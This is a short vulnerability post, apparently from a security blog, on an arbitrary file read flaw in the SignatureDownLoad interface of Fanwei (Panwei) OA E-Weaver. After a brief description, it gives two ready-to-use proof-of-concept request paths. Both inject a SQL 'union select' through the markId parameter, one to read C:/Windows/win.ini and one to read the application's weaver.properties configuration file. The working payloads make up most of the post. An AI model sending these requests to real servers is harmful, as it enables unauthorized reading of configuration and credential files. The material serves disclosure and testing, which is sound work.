Fanwei Oa E Weaver Signaturedownload Arbitrary File Reading Vulnerability
Fanwei Oa E Weaver Signaturedownload Arbitrary File Reading Vulnerability
Panwei OA E-Weaver SignatureDownLoad Arbitrary file reading vulnerability
Vulnerability Description
The Panwei OA E-Weaver SignatureDownLoad interface has a vulnerability to read any file on the server. The attacker can read any file on the server through the vulnerability.
Vulnerability Impact
Panwei OA E-Weaver
Network surveying and mapping
Vulnerability reappears
Verify POC
1
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27
1
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
This post is licensed under CC BY 4.0 by the author.